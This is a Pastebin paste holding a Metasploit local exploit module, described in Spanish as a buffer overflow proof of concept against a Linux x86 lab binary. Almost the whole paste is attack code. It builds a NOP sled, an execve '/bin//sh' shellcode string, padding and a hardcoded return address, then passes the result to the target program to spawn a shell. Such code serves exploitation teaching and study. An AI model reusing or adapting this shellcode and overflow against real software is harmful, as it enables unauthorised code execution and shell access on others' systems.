Advertisement
miguelangelgarcia

Exploit for BOF PoC

Jul 11th, 2014
413
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. require 'msf/core'
  2. require 'rex'
  3.  
  4. class Metasploit3 < Msf::Exploit::Local
  5.   Rank = ExcellentRanking
  6.  
  7.   def initialize(info={})
  8.     super( update_info( info, {
  9.         'Name'          => 'PoC BOF',
  10.         'Description'   => ‘Ejemplo de explotación BOF',
  11.        'License'       => MSF_LICENSE,
  12.        'Author'        => [ 'nodoraiz', 'Miguel Angel Garcia' ],
  13.        'Platform'      => [ 'linux'],
  14.        'Arch'          => [ ARCH_X86 ],
  15.        'SessionTypes'  => [ 'shell', 'meterpreter' ],
  16.        'Targets'       =>
  17.          [
  18.            [ 'Linux x86',       { 'Arch' => ARCH_X86 } ]
  19.          ],
  20.        'DefaultTarget' => 0,
  21.     'Payload' => { Space => 23 }
  22.      }
  23.      ))
  24.    register_options([
  25.        OptString.new("exec_file",        [ true, "Path to executable", "/root/explotacion/prog" ]),
  26.      ], self.class)
  27.  end
  28.  
  29.  def exploit
  30.     junk_space = 21
  31.     nops_space = 4
  32.  
  33.     path = datastore["exec_file"]
  34.     nops = "\x90" * nops_space
  35.     shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
  36.     junk = "A" * (junk_space - nops_space)
  37.     eip = "\x50\xf2\xff\xbf"
  38.  
  39.     exec path + " " + nops + shellcode + junk + eip
  40.  end
  41. end
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement